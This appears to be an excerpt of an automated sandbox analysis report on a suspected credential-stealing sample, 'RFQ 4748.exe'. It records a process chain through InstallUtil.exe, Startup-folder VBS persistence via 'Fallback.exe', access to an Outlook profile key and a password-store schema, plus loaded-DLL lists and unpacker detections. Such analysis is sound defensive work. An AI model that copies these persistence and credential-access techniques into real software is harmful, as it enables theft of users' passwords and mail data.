                  Source: InstallUtil.exe, 00000002.00000002.4496477218.0000000002E24000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002DDF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4500789496.0000000003C3A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002DFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002B59000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4500600689.000000000399B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002B67000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002B8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: RFQ 4748.exeReversingLabs: Detection: 31%
                  Source: C:\Users\user\Desktop\RFQ 4748.exeFile read: C:\Users\user\Desktop\RFQ 4748.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\RFQ 4748.exe "C:\Users\user\Desktop\RFQ 4748.exe"
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fallback.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Fallback.exe "C:\Users\user\AppData\Roaming\Fallback.exe"
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Fallback.exe "C:\Users\user\AppData\Roaming\Fallback.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: RFQ 4748.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: RFQ 4748.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: RFQ 4748.exe, 00000000.00000002.2089151863.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, RFQ 4748.exe, 00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmp, RFQ 4748.exe, 00000000.00000002.2097379487.0000000003E38000.00000004.00000800.00020000.00000000.sdmp, RFQ 4748.exe, 00000000.00000002.2105699680.0000000006C60000.00000004.08000000.00040000.00000000.sdmp, Fallback.exe, 00000005.00000002.2303227720.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Fallback.exe, 00000005.00000002.2288151559.0000000003685000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: RFQ 4748.exe, RFQ 4748.exe, 00000000.00000002.2089151863.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, RFQ 4748.exe, 00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmp, RFQ 4748.exe, 00000000.00000002.2097379487.0000000003E38000.00000004.00000800.00020000.00000000.sdmp, RFQ 4748.exe, 00000000.00000002.2105699680.0000000006C60000.00000004.08000000.00040000.00000000.sdmp, Fallback.exe, 00000005.00000002.2303227720.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Fallback.exe, 00000005.00000002.2288151559.0000000003685000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: RFQ 4748.exe, 00000000.00000002.2105520492.0000000006BC0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: RFQ 4748.exe, 00000000.00000002.2105520492.0000000006BC0000.00000004.08000000.00040000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  .NET source code contains potential unpacker
                  Source: RFQ 4748.exe, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                  Source: Fallback.exe.0.dr, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                  Source: 0.2.RFQ 4748.exe.3e61570.7.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 0.2.RFQ 4748.exe.3e61570.7.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 0.2.RFQ 4748.exe.3e61570.7.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                  Source: 0.2.RFQ 4748.exe.6c60000.11.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 0.2.RFQ 4748.exe.6c60000.11.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 0.2.RFQ 4748.exe.6c60000.11.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                  Yara detected Costura Assembly Loader
                  Source: Yara matchFile source: 0.2.RFQ 4748.exe.6b60000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2105383235.0000000006B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2089151863.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2288151559.000000000336C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RFQ 4748.exe PID: 5272, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Fallback.exe PID: 1096, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_058557B5 push E8FFFFFFh; retf 0_2_058557BA
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06AA6A70 push es; ret 0_2_06AA6A80
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06AA3253 push ss; retf 0_2_06AA3257
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06AD7048 push es; ret 0_2_06AD7054
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06AE9CEA push es; retf 0_2_06AE9CCC
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06AE9C49 push es; retf 0_2_06AE9CCC
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06AE9D66 push es; ret 0_2_06AE9D9C
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06C55ED5 push es; iretd 0_2_06C55F18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06603181 push ebx; retf 2_2_06603182
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_0157D664 push eax; iretd 5_2_0157D682
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06D114ED pushad ; iretd 5_2_06D114EE
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06D10C55 push esp; iretd 5_2_06D10C56
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06D11913 push eax; ret 5_2_06D1191D
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06D63253 push ss; retf 5_2_06D63257
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06D66A70 push es; ret 5_2_06D66A80
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06D9230D push es; ret 5_2_06D92318
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06DAAEB0 push eax; iretd 5_2_06DAAEBE
